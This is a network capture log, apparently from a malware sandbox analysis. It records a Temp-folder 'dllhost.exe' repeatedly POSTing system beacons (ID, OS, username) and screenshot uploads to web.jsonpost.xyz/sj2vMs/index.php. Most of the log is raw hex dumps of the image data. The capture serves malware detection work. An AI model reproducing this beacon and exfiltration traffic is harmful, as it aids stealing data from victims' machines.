                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:41.783072948 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:41.903008938 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:41.903028965 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:41.903049946 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:41.903064013 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:41.903162956 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:41.903196096 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:41.903270006 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.44978972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:43.052773952 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.44979072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:43.254591942 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:43.254626036 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:43.254683018 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:43.254707098 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:43.374886990 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:43.374980927 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:43.375066042 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:43.375081062 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:43.375137091 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:43.375165939 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:43.375300884 CET6180OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.44979172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:44.515260935 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.44979272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:44.669003963 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:44.669038057 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:44.669097900 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:44.669125080 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:44.789112091 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:44.789135933 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:44.789206028 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:44.789272070 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:44.789272070 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:44.789376974 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:44.789482117 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.44979372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:45.889520884 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.44979472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:46.088804007 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:46.088917017 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:46.089009047 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:46.089025974 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:46.209141016 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:46.209160089 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:46.209217072 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:46.209311008 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:46.209323883 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:46.209434986 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:46.209444046 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
